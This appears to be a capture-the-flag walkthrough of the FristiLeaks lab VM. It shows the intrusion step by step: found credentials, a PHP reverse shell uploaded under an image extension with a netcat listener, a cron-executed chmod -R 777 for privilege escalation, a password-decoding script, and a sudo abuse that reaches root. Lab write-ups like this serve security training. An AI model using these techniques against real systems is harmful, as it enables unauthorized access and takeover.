Hello dear friends, welcome back for another CTF Walkthrough. Today we will solve FristiLeaks.
A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..
Analyze the web app
After trying the various urls (cola, sisi, beer) I did understand that the correct one was fristi
By inspecting the source code we can identify an user (eezeepz)
and also we can find an image encoded in base64
We can use this website to convert base64 to image
Fantastic we have a username and password
- Username: eezeepz
- Password: keKkeKKeKKeKkEkkEk
- For the first thing, we will copy a webshell into our ctf directory:
- cp /usr/share/webshells/php/php-reverse-shell.php .
- Then we’ll modify the script with our ip and port
- mv php-reverse-shell.php rev.php.jpg (the uploader accept only file with image extensions)
- nc -nlvp 443
Fantastic we have a reverse shell the next step is to escalate the privilege.
- cd /home/eezeepz
- cat notes.txt
Interesting we can create a file that will be executed with Jerry’s privilege.
- echo ‘/usr/bin/../../bin/chmod -R 777 /home/admin’ > /tmp/runthis
- cd admin
We have two interesting file cryptpass.py and cryptedpass.txt, so we will use the script below with the cryptedpass for get the decrypted password
import base64,codecs,sys def decodeString(str): rot13string = codecs.decode(str[::-1], 'rot13') return base64.b64decode(rot13string) print decodeString("=RFn0AKnlMHMPIzpyuTI0ITG")
Fantastic we got the password (LetThereBeFristi!) for the fristigod user
- su fristigod
- cd /var/fristigod/.secret_admin_stuff
- sudo -u fristi ./doCom /bin/bash
Fantastic we are root !!!
- cd /root/
- cat fristileaks_secrets.txt
Fantastic we have completed the FristiLeaks machine.